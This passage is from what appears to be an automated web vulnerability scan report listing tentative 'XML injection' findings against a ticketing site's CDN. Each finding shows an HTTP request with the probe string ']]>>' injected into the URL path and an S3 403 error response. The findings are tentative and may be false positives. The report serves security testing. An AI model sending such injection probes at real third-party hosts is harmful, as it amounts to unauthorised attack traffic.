The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D55E32430DE49866
x-amz-id-2: 0YbDOszYL06l+YT/XBAV2BGNLm+tumChFElhcdjjaPdAwU4l8izA+2EStKWH3WIk
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 37a748b3c2c8468bc9e44262fc93b2183bb9966ad043723ec08c6d5439308dc83b8c14df34b40b92
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D55E32430DE49866</RequestId><HostId>0YbDOszYL06l+YT/XBAV2BGNLm+tumChFElhcdjjaPdAwU4l8i
...[SNIP]...

8.212. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 05EA5656E471C2F9
x-amz-id-2: Y3/CgH9vxf4khPHqV+k248CBhULNFSofDg/Pfs4ZhBsSSq/5qtHUfXgVYsCUBhV8
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:33 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2b04cef12d08bcbc4aba2f98e34ee355dfaa4026b0dacfcfa90208db1b6979e5395dca9c517246dc
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>05EA5656E471C2F9</RequestId><HostId>Y3/CgH9vxf4khPHqV+k248CBhULNFSofDg/Pfs4ZhBsSSq/5qt
...[SNIP]...

8.213. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts]]>>/bg_bundle2.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4AFEE88B055CB282
x-amz-id-2: MQqOl41EUFQL3jGfJdMUNzxA/xreLU0vH3BFyRsSuHIkmsa0vGgThJcMNF6RPdUx
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:37 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 3f53906a4c7836d2fee1caea6b276cd4af194f9b0666824ed2e0e0394e1100abf59034387ef02bcb
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4AFEE88B055CB282</RequestId><HostId>MQqOl41EUFQL3jGfJdMUNzxA/xreLU0vH3BFyRsSuHIkmsa0vG
...[SNIP]...

8.214. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 99BF904483F966D3
x-amz-id-2: p6qJ/cgVguBl3nlmpAG3L/RKq6oFvrpyxlUHk+7r3bzmjwPocjFwofZ9rjVAZwD5
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:42 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 15cf255aaeaa95cd99593d702cbf71463686ff7b52481ef5e22b502804e26ad513ddfbb0828568ec
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>99BF904483F966D3</RequestId><HostId>p6qJ/cgVguBl3nlmpAG3L/RKq6oFvrpyxlUHk+7r3bzmjwPocj
...[SNIP]...

8.215. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/javascripts/bg_bundle2gz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: EB102B7B59E803B3
x-amz-id-2: VQC42sm2yiDDyQ7eOoKub3dmdvtyJz7ySbOBAjQrFONnPRUGRXdgPRJqQ10uYRY+
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 18d85881c1a7e47497898fa877679dac3d8077093394285c0447d7091a5b7da57112338d7bcd88dd
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EB102B7B59E803B3</RequestId><HostId>VQC42sm2yiDDyQ7eOoKub3dmdvtyJz7ySbOBAjQrFONnPRUGRX
...[SNIP]...

8.216. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts]]>>/bg_bundle2gz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F72FF991C4F9F7D4
x-amz-id-2: SeUTuveXExYFMPH0cvIzO3nE/kc1Pw53egioXtm4aVvNCyxIyIJByFEq2xoDfxAq
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:51 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 1619bdd081f97e9ea154daca86aae3a1510c5146f4001312198dcfbe83d8901f42c0ce6e0cafe573
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F72FF991C4F9F7D4</RequestId><HostId>SeUTuveXExYFMPH0cvIzO3nE/kc1Pw53egioXtm4aVvNCyxIyI
...[SNIP]...

8.217. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 7E17C63772594B09
x-amz-id-2: ElsQOXF8vl19UMV3W8Be5z/OKFKGKcFsclKeWtNVw0Ix5aM8K3UEej/4icyfU/RE
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f77948c72d3cbf81d4ae28b074b4a04cebae99801ec2c027b10f93eed3d2000c19be09230067efea
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>7E17C63772594B09</RequestId><HostId>ElsQOXF8vl19UMV3W8Be5z/OKFKGKcFsclKeWtNVw0Ix5aM8K3
...[SNIP]...

8.218. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/javascripts/bingmap_bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BE02BEE2ECA0B8AE
x-amz-id-2: bsr+PBVke4JmC/2UIbtWzTuNijwJc8PUdLQuFCl9l9Sn6PCg+ffH3hBWF7MTGgks
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:41 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 5c360df236bfc0ba0324933754ae18ca3fee3dcafc4b9cf314dba79bc40a8fdf5c5ddcb5fc54de0b
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BE02BEE2ECA0B8AE</RequestId><HostId>bsr+PBVke4JmC/2UIbtWzTuNijwJc8PUdLQuFCl9l9Sn6PCg+f
...[SNIP]...

8.219. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts]]>>/bingmap_bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 2BC418B7F60EE037
x-amz-id-2: Vy/+6fNytnEjTiO5pqnFJ3PdgEJswu12QGBrJNlZtKi0111vs3WkY0xlm22q7AVz
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:47 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 091a72f545e2ef1f165504a91fbd221c9f1716d0302f8b295dc405befabf40596d3195e75938caa9
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2BC418B7F60EE037</RequestId><HostId>Vy/+6fNytnEjTiO5pqnFJ3PdgEJswu12QGBrJNlZtKi0111vs3
...[SNIP]...

8.220. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 209630181079E04A
x-amz-id-2: 9NNx5vJJT7rlnKQ9WD7nsChUvGtWDSKIpNGjm8CvugQwm8gcBtbCZgTOacjV2Idi
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 837051c7482ca601773034702b3ba71f5e723e47f7eee842649384de03055cc908dc9f5429581988
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>209630181079E04A</RequestId><HostId>9NNx5vJJT7rlnKQ9WD7nsChUvGtWDSKIpNGjm8CvugQwm8gcBt
...[SNIP]...

8.221. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4E9E2819F31DCB39
x-amz-id-2: TjzzDdqB7aMnNXELibKZCFpccnF7fRUY2RESMH7gmEvwIslwK7KwvcWbS4pFCsQW
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:25 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b20141431349f0083e79b1c95805e52d3aabcdc0f02f7784b35ed8a2a5715dbbfb1f1ff23f2eec5e
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4E9E2819F31DCB39</RequestId><HostId>TjzzDdqB7aMnNXELibKZCFpccnF7fRUY2RESMH7gmEvwIslwK7
...[SNIP]...

8.222. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts]]>>/checkout_interstitial.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8966D4E9FF5E403B
x-amz-id-2: 5GE8zcAkl30CPd1rVM3bb40IHXmOThR7j4eCV+e4NHQTInz3j4M1Kvda3zb7TQ1k
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:30 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: a718e20841ccd7b024ed990340776916976160c264c2f5033cbc5c36596f594bf27ec4fa80c03201
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8966D4E9FF5E403B</RequestId><HostId>5GE8zcAkl30CPd1rVM3bb40IHXmOThR7j4eCV+e4NHQTInz3j4
...[SNIP]...

8.223. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 819A30940EB51C98
x-amz-id-2: SIUedySiaHk/Mh7l2vDeA+Vm9pa2WXmQNexLlny9Q9bfFx5deyiZ81WqfXnLuKF9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:34 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 63c377054fd8f0abba6dea2a111f340728612c8700ce772419826244756a653fdbcbb878e01e5855
